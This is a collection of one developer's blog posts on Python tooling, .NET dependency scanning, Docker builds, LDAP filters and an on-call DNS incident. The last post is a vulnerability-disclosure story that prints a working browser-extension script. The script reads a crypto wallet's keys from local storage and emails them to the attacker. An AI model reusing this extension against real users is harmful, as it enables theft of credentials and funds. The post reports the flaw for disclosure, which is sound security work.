DEV Community: Andrey Krisanov

uv: Cargo-like Python Tool That Replaces pipx, pyenv, and more

Andrey Krisanov — Wed, 10 Sep 2025 10:53:39 +0000

Overview

uv is an end-to-end solution for managing Python projects, command-line tools, single-file scripts, and even Python itself.

Think of it as Python’s Cargo: a unified, cross‑platform tool that’s fast, reliable, and easy to use.

This post is not a deep introduction to uv — many excellent articles already exist; instead, it’s a concise cheat sheet for everyday use.

Installation & Updates

# Install
curl -LsSf https://astral.sh/uv/install.sh | sh

# Update
uv self update

Managing Python Versions

Instead of juggling tools like pyenv, mise, asdf, or OS‑specific hacks, you can simply use uv:

# List available versions
uv python list

# Install Python 3.13
uv python install 3.13

Works the same across all OSes
No admin rights required
Independent of system Python

You can also use mise alongside uv if you prefer a global version manager.

Projects & Dependencies

Initialize a new project (creates a pyproject.toml automatically):

uv init myproject or # uv init -p 3.13 --name myproject
cd myproject

Sync dependencies (similar to pip install -r requirements.txt, but faster and more reliable):

uv sync

Add dependencies:

uv add litestar
uv add pytest --dev

Lock dependencies (generates a cross‑platform lockfile, like Pipfile.lock or poetry.lock):

uv lock

💡 The lock file is cross platform, so you can develop on Windows and deploy on Linux.

Fast Virtual Environments

# Create & activate venv automatically
uv venv
source .venv/bin/activate

# Or skip activation and run directly with uv:
uv run python app.py

Scripts

# Create a new script
uv init --script

# /// script
# requires-python = ">=3.13"
# dependencies = [
#     "requests",
# ]
# ///
import requests

print(requests.get("https://akrisanov.com"))

Run single‑file scripts with automatic dependency installation:

uv run script.py

💡 On *nix, add #!/usr/bin/env -S uv run (then chmod +x) to automatically call uv run for a script.

Tools

Install CLI tools globally, isolated from system Python:

uv tool install ruff # replaces pipx
uv tool install httpie

uvx httpie # a shortcut

# --with [temp dependency] runs jupyter in the current project
# without adding it and its dependencies to the project
uv run --with jupyter jupyter notebook

💡 uv run is fast enough that it implicitly re‑locks and re‑syncs the project each time, keeping your environment
up to date automatically.

If you're developing a CLI tool, uv can help minimize the friction:

uv init --package your_tool
uv tool install . -e

See the tools documentation

Replacing pip-tools

uv pip compile # replaces pip-tools compile
uv pip sync    # replaces pip-tools sync

Building and publishing packages

# Build a `.whl` package for PyPI
uv build
# Upload your Python package to PyPI
uv publish

Pre-commit hooks

uv run --with pre-commit-uv pre-commit run --all-files
pre-commit-uv

GitHub Actions

astral-sh/setup-uv # brings UV to GitHub Actions

Docker

Official Docker images provide uv and Python preinstalled:

ghcr.io/astral-sh/uv:latest

Also, check [Production-ready Python Docker Containers with uv (https://hynek.me/articles/docker-uv/) by Hynek Schlawack.

Workspaces

uv supports organizing one or more packages into a workspace to manage them together.

Example: you might have a FastAPI web application alongside several libraries, all versioned and maintained as separate Python packages in the same Git repository.

In a workspace, each package has its own pyproject.toml, but the workspace shares a single lockfile, ensuring that the workspace operates with a consistent set of dependencies.

Things to Keep in Mind

uv sync respects .python-version, but the UV_PYTHON environment variable takes precedence
Uses python‑build‑standalone, which can be slightly slower than system builds (~1–3%) and lacks CPU‑specific optimizations
Cache size can grow large (a trade‑off for speed and reliability)
Legacy projects may fail if they depended on pip’s older, looser dependency resolution rules

Why uv Matters

Python has always had a fragmented ecosystem of tools: pip, pip-tools, virtualenv, venv, pipx, pyenv, poetry, tox…

With uv, we finally get something closer to Rust’s Cargo or JavaScript’s npm/pnpm: a single, consistent, cross‑platform tool for environments, dependencies, scripts, and tools — and it’s fast.

References & Further Reading

Dependency Sources — explains how uv resolves dependencies
UV with Django
PEP 723 – Inline script metadata
WIP: Using uv run as a task runner

Additional Notes

While some people don’t care about uv being fast, it’s shaved minutes off CI builds and container rebuilds — saving money and energy.
Astral capitalized on a very promising project called python-build-standalone and now maintains it. These are Python builds that work without installers.

Originally published on akrisanov.com

Identifying Vulnerable Dependencies In .NET Projects

Andrey Krisanov — Tue, 07 May 2024 00:00:00 +0000

Some time ago, I was working in a company that was building a SaaS that was written in .NET. The code base was a decade old, and like many companies using Microsoft technologies, it had been through a few framework upgrades. The intent was to move to modern technologies and refactor outdated components, but the execution was rather poor. By the time I put on my engineering manager's hat, many of the NuGet packages in the solution were out of date and even deprecated.

In Python and Go projects, I rely heavily on linting, static analysis, and formatting tools. Not having these essentials would make me and my teams less productive. So the first thing I did was understand what modern .NET brings to the table in this area. And I started by scanning the NuGet packages we use in all of our projects in a single solution for potential vulnerabilities.

It turned out that developers could simply run dotnet list package --vulnerable locally to keep an eye on security. But without automation, it's too easy to forget about that.

My first local scan produced the following result:

...
Project `X.Infrastructure.Calendar` has the following vulnerable packages
   [net6.0]:
   Top-level Package Requested Resolved Severity Advisory URL
   > System.Data.SqlClient 4.8.3 4.8.3 Moderate https://github.com/advisories/GHSA-8g2p-5pqh-5jmc
                                                       High https://github.com/advisories/GHSA-98g6-xh36-x2p7

The given project `X.Infrastructure.Common` has no vulnerable packages given the current sources.
Project `X.Infrastructure.Currency` has the following vulnerable packages
   [net6.0]:
   Top-level Package Requested Resolved Severity Advisory URL
   > System.Data.SqlClient 4.8.3 4.8.3 Moderate https://github.com/advisories/GHSA-8g2p-5pqh-5jmc
                                                       High https://github.com/advisories/GHSA-98g6-xh36-x2p7

Project `X.Infrastructure.Locker` has the following vulnerable packages
   [net6.0]:
   Top-level Package Requested Resolved Severity Advisory URL
   > System.Data.SqlClient 4.8.3 4.8.3 Moderate https://github.com/advisories/GHSA-8g2p-5pqh-5jmc
                                                       High https://github.com/advisories/GHSA-98g6-xh36-x2p7

The given project `X.Infrastructure.Locker.Tests.Unit` has no vulnerable packages given the current sources.
The given project `X.Infrastructure.Pool` has no vulnerable packages given the current sources.
Project `X.Infrastructure.Repositories` has the following vulnerable packages
   [net6.0]:
   Top-level Package Requested Resolved Severity Advisory URL
   > System.Data.SqlClient 4.8.3 4.8.3 Moderate https://github.com/advisories/GHSA-8g2p-5pqh-5jmc
                                                       High https://github.com/advisories/GHSA-98g6-xh36-x2p7

The given project `X.Infrastructure.Rules` has no vulnerable packages given the current sources.
...

As you can see, there are several projects vulnerable to CVE-2022-41064.

.NET Framework System.Data.SqlClient versions prior to 4.8.5 and Microsoft.Data.SqlClient versions prior to 1.1.4 and 2.0.0 prior to 2.1.2 is vulnerable to Information Disclosure Vulnerability.

To get rid of the issue, it's enough to upgrade the package:

dotnet add package System.Data.SqlClient -v 4.8.6

Now, how can developers prevent such situations? You already know the answer: automation!

After sharing my observations with the team, I created a merge request with a new GitLab pipeline that runs for every open merge request and master branch.

These are the changes in the .gitlab-ci.yml manifest:

stages:
  - security

vulnarable-dependencies:
  stage: security
  image: mcr.microsoft.com/dotnet/sdk:6.0-bullseye-slim
  before_script:
    - dotnet restore
  script:
    - dotnet list package --vulnerable 2>&1 | tee vulnerable-packages.log
    - >-
      ! grep -qiw "critical\|high\|moderate\|low" vulnerable-packages.log;
      if [$? -ne 0]; then
        echo "🚨 Found vulnarable packages";
        exit 1
      else
        exit 0
      fi
  artifacts:
    when: always
    expire_in: 12h
    paths:
      - vulnerable-packages.log
  only:
    - master
    - merge_requests
  tags:
    - docker

The pipeline will fail if any of the projects in the solution have vulnerable packages. The downloadable log file contains the list of vulnerabilities and their severity.

This way, the team is always aware of the state of the dependencies and can take action to fix them.

References:

How to Scan NuGet Packages for Security Vulnerabilities

Convert Flac to Apple Lossless With FFmpeg

Andrey Krisanov — Sun, 22 Oct 2023 22:17:02 +0000

I'm a longtime Apple Music user. Most of my so-called music collection is on the streaming service. However, I occasionally buy rare or remastered releases ripped from CDs. These releases are usually in the FLAC format, which Apple Music doesn't support. But I've found an easy workaround that allows me to organize and play albums on the go.

The centerpiece of the workaround is FFmpeg. So if you don't already have it installed, it's worth installing now:

brew install ffmpeg

Homebrew Formula

When the tool is ready to use, navigate to the folder containing the FLAC files and run the following script:

for file in *.flac; do ffmpeg -i "$file" -acodec alac -vcodec copy "`basename "$file" .flac`.m4a"; done; mkdir flac; mkdir alac; for file in *.flac; do mv "$file" "flac/"; done; for file in *.m4a; do mv "$file" "alac/"; done;

Silly One-liner Converting FLAC to ALAC

Susumu Hirasawa – Siren [Limited Edition]

The bash script converts the audio to the Apple Lossless format (*.m4a) and moves the files to the alac directory:

Finally, the alac directory can be dragged to Apple Music to import the album and upload its tracks to the cloud.

The Uploaded Album

👉 You probably wonder why this album has no Lossless icon in Apple Music. Well, it turns out the audio quality of the FLAC files wasn't on pair with lossless. So, make sure releases you buy or rip, have a proper audio codec and quality.

Generating A Lockfile For Python Project Using Github Actions

Andrey Krisanov — Thu, 12 Oct 2023 21:21:49 +0000

If you're working on a project that needs to be packaged for a specific environment other than your machine, the CI/CD server is your best friend. Products like Github Actions can save you time and the hassle of building dependencies you won't use in development.

For example, many developers love Mac computers, especially the ones that come with Apple silicon. The sad truth is that we rarely deploy our code on servers with these processors and MacOS. Most of the time, projects run on Linux. Unfortunately, Python can't guarantee a deterministic or reproducible environment.

Running the command to create a list of all the dependencies that your package will need gives a different result on MacOS, Linux, Windows, and so on:

pip-compile --allow-unsafe --generate-hashes --no-emit-index-url --output-file=requirements-lock.txt > requirements-lock.txt

Using pip-tools to compile a requirements.txt file from your dependencies

Not all dependencies have universal wheels. Moreover, users can install different Python versions.

Now that you see the problem, let's take a quick look at possible solutions.

name: Build requirements-lock.txt

on:
  workflow_dispatch:

jobs:
  build-requirements-lock:
    runs-on: ubuntu-22.04
    steps:
      - uses: actions/checkout@v3
      - name: Set up Python 3.9
        uses: actions/setup-python@v3
        with:
          python-version: "3.9"
      - name: Install pip and pip-tools
        run: |
          pip install --upgrade pip
          pip install --upgrade pip-tools
      - name: Run pip-compile
        run: |
          pip-compile --allow-unsafe --generate-hashes --no-emit-index-url --output-file=requirements-lock.txt > requirements-lock.txt
      - name: Upload requirements-lock artifact
        uses: actions/upload-artifact@v3.1.1
        with:
          name: requirements-lock
          path: requirements-lock.txt
          retention-days: 3

build-requirements-lock-workflow

The Github Actions manifest above defines a workflow that can be triggered manually on any branch you like.

Suppose you're upgrading some dependencies in requirement.txt. pip install -r requirements.txt works fine. Now you want to generate a new lock file for the users. You commit the changes to your branch, wait for the tests to pass, and trigger the workflow:

Github Actions Workflow

A freshly generated requirements-lock.txt appears in downloadable artifacts. You download the file and add it to the repo.

Another option might be to run a similar workflow in a Docker container. I posted a note about multi-architecture builds a few months ago. Take a look! Just make sure you choose the same architecture and Python version that you want to distribute your project to.

Other tools like Poetry might do the job better and provide more convenient ways of managing lock files. But if you have reasons to not use them, it's totally fine to stick with good old pip.

Synchronizing Users From LDAP With Keycloak Using AD Filters

Andrey Krisanov — Sat, 23 Sep 2023 19:32:41 +0000

One of the ways to synchronize users via a third-party provider with Keycloak is a mechanism called User Federation. It allows, using Kerberos or LDAP protocol, to pull user entries from your corporate authentication storage. However, if your organization is big enough to have a complex structure and there are a lot of users in the user directory, it could be challenging to get only a subset of the accounts that belong to different organization units.

For example, Active Directory models a tree-based structure using the following entities:

CN = Common Name
OU = Organizational Unit
DC = Domain Component

All the distinguished names can be found in the official documentation provided by Microsoft.

To configure a new User Federation in Keycloak, it's required to specify a User DN. This distinguished name is the base object in the directory information tree where the search begins forming candidates for pulling authentication entries. Therefore, we need to know how to construct the User DN.

The base option that an Active Directory administrator could use to create user accounts is to organize them under organizational units:

OU=Main,DC=Orgname,DC=ru

Even if your organizational unit has a complex structure, it's still relatively easy for Keycloak to find user entries inside it – just activate the Search Scope: Subtree setting when configuring the user federation. In large organizations, the Active Directory structure can get quite messy. Instead of using clear distinguished names, administrators do something surprising even to them. How about putting entries under CN in different organizational units?

This is what I encountered while working on corporate user authentication for a media platform's CMS. User entries of the editors were grouped via the Common Name. So, there is no way to define User DN in the way I've mentioned in the example above. Fortunately, the LDAP connection allows providing a filter for Active Directory. In my case, writing the filter to select all of the members of the CMS_EDITOR group was enough to solve a problem:

(&(objectCategory=Person)(sAMAccountName=*)(|(memberOf=CN=CMS_EDITOR,OU=Security,OU=Groups,OU=Central,OU=Main,DC=Orgname,DC=ru)))

Moreover, the Custom User LDAP Filter setting in Keycloak supports logical operators like or with |, and I could use it for finding not only the members of the editor staff but also CMS admins, guests, etc.

Understand How Services Are Run And Operate In Production

Andrey Krisanov — Wed, 06 Sep 2023 17:30:51 +0000

Over the past few years, I've been interviewing dozens of software engineers who didn't know how their developed services run and operate in production. The reason for that is a rising trend in software engineering trusting in an infrastructure team, the magic of the cloud, Docker, Kubernetes, and whatnot.

A conversation with a talent usually looks the following:

– How do you ship your service to production?

– We build Docker images and run containers.

– Sounds cool! Can you tell me about the resource requirements for a container?

– Hmm, to be honest, I don't know the details. DevOps folks take care of that.

– (discussing Python app) OK. And what application server do you use?

– Application Server? (Some people even reply: "You mean WSGI?")

– Yes, the thing that handles web requests and runs your Python code.

– Hmm, let me open a project repo and check...

– It's...Gunicorn!

– Great. Can you estimate how many requests the web application can handle?

– I don't think so because we don't do load testing.

– So, it's not possible to do even a rough estimation?

– Nope.

– OK. Do you understand what happens on a processes and threads level when the application server processes a request?

This is where the conversation hits a dead end. Many talents don't. And this is a red sign to me. It gets worse when a candidate claims they have experience with (semi)async services in production but can't explain a service model they have chosen and how the services operate because of that (including resources allocating and consumption).

You might say: "Why do I need to know all that low-level stuff in the 2020s?". Fair enough...if you don't develop software for thousands of users, have an unlimited budget for underutilized hardware, don't design distributed systems, or, simply, have an SRE team ready to solve all possible issues for you. Otherwise, please do.

Choosing Apache Kafka For A New Project – A Questionnaire

Andrey Krisanov — Mon, 28 Aug 2023 22:03:22 +0000

In any modern project where there is a need to process events – a set of messages or a stream of data – developers often propose Apache Kafka as the infrastructure solution. This is not always a weighted choice – where a classic broker like ActiveMQ will do, marketing sometimes prevails.

But let's assume that you have deliberately chosen Kafka, or that the infrastructure team has left you no alternative. Before setting up broker parameters and writing producers and consumers, what questions should you ask yourself? To ensure a smooth start, I have prepared the following checklist/questionnaire:

The amount of data that is going to be generated by the producers → Will the network channel be sufficient for the entire system and its critical components? Is there an option to make use of message compression?
Data retention policy: How long do you need to keep data? → Consider the business and data protection requirements of a product you are developing, and the cost of storing data.
Message sending guarantees (Acks) → Finding the right balance between latency and reliability within replication (durability).
Message delivery guarantees → How critical is message loss or duplication of messages to the business objective? Are idempotency and transactionality needed?
What partitioning strategy will producers use? → Is the default strategy (Default partitioner) appropriate?
For a particular topic, is it important to store the entire message log, or are the latest changes sufficient → Consider using Compacted topics.
Do the created topics require a consumer group? → How do you plan to scale consumers and their bandwidth? What happens when the group is rebalanced?

That's it. The checklist/questionnaire is by no means exhaustive and it only covers the essentials. It leaves out a lot of things such as data encryption, authentication, authorisation, and cluster configuration – assuming that the SRE team or some PAAS will take care of that for you.

My "It's not DNS" story

Andrey Krisanov — Sat, 12 Aug 2023 12:14:55 +0000

Summer of 2019. I'm joining a large retail organisation that is undergoing a digital transformation. The role I've been hired for is a technical leadership role. The project I'm taking over doesn't even have a complete team yet, which means I'll be wearing all sorts of hats until I hire someone and delegate work. You could say, I'm the only "developer" on the team. Also, the code base is already serving users, and the services are part of a lead generation funnel for one of the grocery networks. So if something goes down, the company loses potential customers and revenue. The fact that the project was developed by an outsourced team that has already left without handing over proper documentation makes things more complicated and fragile.

In a few days, I try to understand how the services are run in production, write missing README and system design papers, and create initial tasks for maintenance. All goes well, and I manage to deploy some changes to the backend. It's Friday afternoon, so I still have time to do a rollback if I've made a mistake. But nothing suspicious has been observed during the day, and I leave the office for the weekend.

The fun begins on Sunday. Because I'm in charge of the project, I'm the one who is on-call. I get a call from our support team telling me that the web application isn't responding from time to time and that they're getting complaints from customers.

The first thing I do is open my browser to check what users are seeing. Surprisingly, a web page loads just fine. I hit refresh – same result. Then I turn off Wi-Fi on my iPhone and open Safari – 504 error. It's a Nginx page. Now it is something.

Simplified diagram of the project architecture

I open the monitoring and observe no high load. CPU usage is low, more than 50% of memory is free, plenty of free disk space on each of the virtual machines, no spikes in the network bandwidth. Looking at the Nginx logs only proves that there's a gateway timeout error related to the backend. I should check the application backend logs. Nothing there, no errors at all.

At this point, I start to blame the network and call the network infrastructure team. These guys work on an organisational level and potentially can see what I can't. After spending an hour investigating together, we see nothing. It's already Sunday evening, and I'm almost hopeless.

I decide to take a break and go for a walk. When I'm back, I try to ssh to a VM again. Suddenly, I notice a few seconds of delay before I can type my commands into a terminal. "It can't be DNS", I say to myself. To prove it, I ping a public domain from our network. Again, a few seconds of delay and the network packets are flying without a hitch. "If DNS was down, the infrastructure team would notice.", I continue to reason. Before escalating the situation further to upper management, I choose to check the DNS configuration on the backend virtual machines.

The /etc/resolv.conf is a DNS resolver configuration file. It contains records in the following format:

nameserver [ip]
nameserver [ip]

/etc/resolv.conf

In my developer's mind, a Linux machine receives these records at boot time and caches them. This file is then queried to resolve domains. What could possibly go wrong? Well, I ask the infrastructure team about the IP addresses I see in /etc/resolv.conf and get a surprising answer: "The IP addresses are DNS load balancers and the first one in the list is currently down". Hearing this, I begin to understand why the ssh and initial ping delays are happening. The first DNS load balancer is queried, but because it's down, it doesn't respond, and the resolution continues with the second IP address.

I remove the first nameserver from /etc/resolv.conf and drop the DNS cache on each of the VMs. After a few seconds, the 504 error and the gateway timeout disappear. In the morning, we'll discuss the incident with the infrastructure team and senior management. Fun week ahead.

It's not DNS
There's no way it's DNS
It was DNS

Old Japanese Haiku

Building Multi-Arch Images for Arm and x86

Andrey Krisanov — Thu, 10 Aug 2023 19:58:44 +0000

At work, I am involved in the development of a machine learning SDK and cloud services for privacy and data protection. Like almost every company in this space, we rely heavily on Python's scientific ecosystem. Because it's quite mature and depends on native library development that started years ago, getting these packages to work on new architectures can be tedious.

I am one of the few developers on our team who has stuck with MacOS and have a Macbook Pro with M1 chip. There is no easy way for me to bootstrap our development environment in a matter of minutes. I have to use Conda, install specific versions of Python packages, patch some native libraries, and even create a symlink from an OS-specific package to its generic name (I'm talking to you, Tensorflow). People on the x86_64 architecture generally won't have this problem – almost every package we use comes with a pre-built wheel for a chosen OS. Moreover, to install the SDK as a dependency of, say, an HTTP API service, I had to assemble it from sources: pip install -e '.'

A few months ago we didn't even support the Arm64 architecture at a build level. This changed when I introduced a Github Action pipeline to build Python wheels for Linux x86_64, aarch64, and universal. Instead of manually compiling some native libraries on my machine, I moved the work to GitHub and its Linux instances. From that moment on, I could just get the package from a private PyPI registry. The sad truth is that I still use Conda and sometimes patch one or two transitive dependencies for my M1 chip. But other than that, no hard times to date.

Today I needed to distribute a newly created API service with the SDK inside as a Docker image. And I haven't found an easy way to define a Dockerfile that can be built and run on Apple Silicon without Conda:

FROM python:3.9-slim-buster AS base

ENV PYTHONDONTWRITEBYTECODE=1
ENV PYTHONUNBUFFERED=1

# Install Conda

RUN apt-get update && apt-get -y upgrade
RUN apt-get install -y --no-install-recommends build-essential g++ gcc libssl-dev cmake git wget
RUN rm -rf /var/lib/apt/lists/*

ENV PATH="/root/miniconda3/bin:${PATH}"
ARG PATH="/root/miniconda3/bin:${PATH}"

RUN wget \
    https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-aarch64.sh \
    && mkdir /root/.conda \
    && bash Miniconda3-latest-Linux-aarch64.sh -b \
    && rm -f Miniconda3-latest-Linux-aarch64.sh

# Create a Conda environment and install native dependencies

RUN --mount=type=cache,target=/root/.cache \
    conda init bash && . /root/.bashrc && \
    conda update conda && \
    conda create -n de_agent python=3.9 && \
    conda env config vars set -n de_agent LD_PRELOAD=/usr/lib/aarch64-linux-gnu/libgomp.so.1 && \
    conda activate de_agent && \
    conda install gdal llvmdev dm-tree -y && \
    pip install --upgrade pip setuptools wheel && \
    pip install h3

# Copy application files

WORKDIR /app

COPY app/ .
COPY logging.yaml .
COPY main.py .
COPY requirements.txt ./

# Install Python packages

ARG DE_AGENT_PYPI_TOKEN

RUN --mount=type=cache,target=/root/.cache \
    . /root/.bashrc && conda activate de_agent && \
    pip install -r requirements.txt --extra-index-url=https://${DE_AGENT_PYPI_TOKEN}:@pypi. ****.ai/pypi/ && \
    pip install numpy==1.23.5

# Cleanup

RUN apt -qy purge --auto-remove build-essential g++ gcc libssl-dev cmake git wget
RUN apt autoremove && apt clean
RUN rm -rf /var/lib/apt/lists/*

# Create a user

RUN groupadd -r de_agent && useradd -r -m -g de_agent de_agent
RUN chown -R de_agent:de_agent /app

USER de_agent

# Run the web application

EXPOSE 8000

ENTRYPOINT ["PYTHONPATH=.", "python", "main.py"]

Dockerfile.arm64

As you can see, the manifest is quite verbose. It also adds the Conda binaries and related files to a release image. It is a price that must be paid.

Fortunately, for Linux, we don't need all of this machinery:

FROM python:3.9-slim-buster AS base

ENV PYTHONDONTWRITEBYTECODE=1
ENV PYTHONUNBUFFERED=1

# Install system packages

RUN apt-get update && apt-get -y upgrade
RUN apt-get install -y --no-install-recommends build-essential g++ gcc libssl-dev cmake git wget
RUN rm -rf /var/lib/apt/lists/*

# Copy application files

WORKDIR /app

COPY app/ .
COPY logging.yaml .
COPY main.py .
COPY requirements.txt ./

# Install Python dependencies

ARG DE_AGENT_PYPI_TOKEN

RUN --mount=type=cache,target=/root/.cache \
    pip install -r requirements.txt --extra-index-url=https://${DE_AGENT_PYPI_TOKEN}:@pypi. ****.ai/pypi/

# Cleanup

RUN apt -qy purge --auto-remove build-essential g++ gcc libssl-dev cmake git wget
RUN apt autoremove && apt clean
RUN rm -rf /var/lib/apt/lists/*

# Create a user

RUN groupadd -r de_agent && useradd -r -m -g de_agent de_agent
RUN chown -R de_agent:de_agent /app

USER de_agent

# Run the web application

EXPOSE 8000

ENTRYPOINT ["PYTHONPATH=.", "python", "main.py"]

Dockerfile.amd64

The question now is how to build Docker images for both architectures on a Mac. This is where Docker comes in. Docker Desktop officially supports building multi-arch images for Arm and x86. Learning this, I was able to add a few targets to my Makefile to quickly build images:

build: # Build a Docker image for x86_64
    docker buildx build --platform linux/amd64 -t de-agent:amd64-latest --build-arg DE_AGENT_PYPI_TOKEN=${DE_AGENT_PYPI_TOKEN} -f Dockerfile.amd64 --no-cache .

build-arm: # Build a Docker image for arm64
    docker buildx build --platform linux/arm64 -t de-agent:arm64-latest --build-arg DE_AGENT_PYPI_TOKEN=${DE_AGENT_PYPI_TOKEN} -f Dockerfile.arm64 --no-cache .

Makefile

make build

Docker image built for the amd64 architecture

One can say, it's so much hassle for doing all of this locally and a proper CI can solve such a case easily. I agree – as I've mentioned, I like shifting work out of my shoulders and giving it to some machine in the cloud. But in situations where CI is not available, creating multi-arch images can save the day. It certainly did for me.

Accidentally found a vulnerability in a crypto wallet and made $1,000

Andrey Krisanov — Sat, 05 Aug 2023 11:16:49 +0000

In January 2022, I joined the community of one of the proof-of-stake blockchains. To play with what the protocol and its ecosystem offered, I created a wallet account on the official website https://wallet. ****.org. Apart from general curiosity, I was interested in how they achieved security in a browser, especially in the age of extensions and client-side vulnerabilities.

It turned out that when a user logged in, the wallet application (built in React) generated a set of public and private keys and stored them in the browser's local storage. With my experience of building authentication and authorisation in distributed systems, I knew this was not the best thing to do – in general, it's easy for a browser extension and client-side code to read data from local storage¹.

To prove this, I decided to write a simple extension for Chrome that would retrieve keys from a victim's browser and send them to my anonymous email address.

The root directory of my pickpocket extension looked like this:

.
├── content.js
├── email.min.js
├── index.html
└── manifest.json

The main files are the manifest.json and content.js. The former is essential for installing the extension.

{
  "name": "X Wallet Enhancement",
  "version": "1.0",
  "manifest_version": 3,
  "content_scripts": [
    {
      "matches": [
        "https://wallet. ****.org/*"
      ],
      "js": [
        "email.min.js",
        "content.js"
      ]
    }
  ]
}

email.min.js is just a client library from one of the cloud services that allows you to send email directly from a browser without any server code. index.html is a blank HTML page that displays nothing. The wallet hijacking logic lived in the content.js file:

emailjs.init('user_ ****'); // instantiating an email delivery service

let templateParams = {
    // gathering information about the victim's browser
    from_name: navigator.userAgent,
    // fetching wallet keys from the local storage
    storage: window.localStorage.getItem('_*:wallet:active_account_id_**'),
};

// using a prepared email template to send an email with keys
const serviceID = 'service_ ****';
const templateID = 'template_ ****';

emailjs.send(serviceID, templateID, templateParams)
    .then(() => {
        console.log("Wallet keys were send!");
    }, (err) => {
        console.error(JSON.stringify(err));
    });

Yes, such a dummy script.

I packed all four files into a zip archive and kindly asked my friend, who also had a wallet at https://wallet.***.org, to install my creation in his browser (pretending to do some social engineering). Before doing so, I told him about my findings and the theory I was trying to prove. He was happy to help, and the public and private keys of this wallet account appeared in my inbox a few seconds after the browser extension was installed. Next, I saved the keys to local storage in my browser and opened the wallet website.

Surprisingly, my friend's crypto-wallet balance was available to me, along with an option to withdraw the funds. During a Zoom call with my victim friend, I transferred some of his funds to an anonymous account and back. It was mind-blowing! A new, promising blockchain that had recently closed an investment round had a major vulnerability in its wallet. Worst of all, they had 2-factor authentication for users. Of course, not many people would activate it right away, and many didn't.

As an ethical developer, I created a vulnerability report, including the source code of the browser extension and my thoughts on how to improve the security of the web application. It was sent directly to the security team's email address on 18th of January. A few days later, I had a call with the CISO of the blockchain protocol, who assured me that they were aware of the issue and would address it in the next release. I was a little disappointed with the speed of the response to the incident. Two days is an eternity when one speaks about users' money. Nevertheless, the blockchain developers granted me their tokens in an amount equivalent to 1000 USDT.

👉 Advice for application developers: be aware of the technologies you use and their security aspects.

💡 Advice for crypto users: learn what security options an organisation offers to you, activate two-factor authentication as soon as you create a wallet account, don't store all of your funds in hot wallets.